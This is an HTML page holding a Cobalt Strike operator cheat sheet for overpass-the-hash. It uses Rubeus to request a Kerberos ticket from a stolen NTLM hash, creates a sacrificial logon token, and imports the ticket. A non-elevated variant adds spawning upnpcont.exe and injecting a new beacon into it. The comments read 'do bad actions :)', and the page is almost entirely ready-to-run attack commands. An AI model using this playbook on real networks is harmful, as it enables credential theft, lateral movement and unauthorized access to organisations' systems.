<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>New Page</title>
</head><body>##### IF ELEVATED:<br/>
<br/>
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)<br/>
beacon&gt; execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH<br/>
<br/>
# decode the base64 blob to a binary .kirbi<br/>
$ base64 -d ticket.b64 &gt; ticket.kirbi<br/>
<br/>
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)<br/>
beacon&gt; make_token DOMAIN\USER PassWordDoesntMatter<br/>
<br/>
# inject the .kirbi<br/>
beacon&gt; kerberos_ticket_use /home/user/ticket.kirbi<br/>
<br/>
# do bad actions :)<br/>
<br/>
# revert- clears out the sacrificial logon session, so the original context's tickets are restored to normal<br/>
beacon&gt; rev2self<br/>
<br/>
<br/>
<br/>
##### IF NOT ELEVATED<br/>
<br/>
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)<br/>
beacon&gt; execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH<br/>
<br/>
# decode the base64 blob to a binary .kirbi<br/>
$ base64 -d ticket.b64 &gt; ticket.kirbi<br/>
<br/>
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)<br/>
beacon&gt; make_token DOMAIN\USER PassWordDoesntMatter<br/>
<br/>
# Create a sacrificial process. &nbsp;We have to do this due to the way beacon handles tokens now. You can't create a process with a token as a low prived user.<br/>
beacon&gt; run C:\Windows\System32\upnpcont.exe<br/>
<br/>
# inject into the newly spawned process<br/>
beacon&gt; inject x64 &lt;NEW_PID&gt; &lt;listener_name&gt;<br/>
<br/>
# inject the .kirbi<br/>
new beacon&gt; kerberos_ticket_use /home/user/ticket.kirbi<br/>
<br/>
# do bad actions :)<br/>
<br/>
# kill the runas beacon when actions are completed<br/>
<br/>
# revert in the original beacon-<br/>
beacon&gt; rev2self<br/>
</body></html>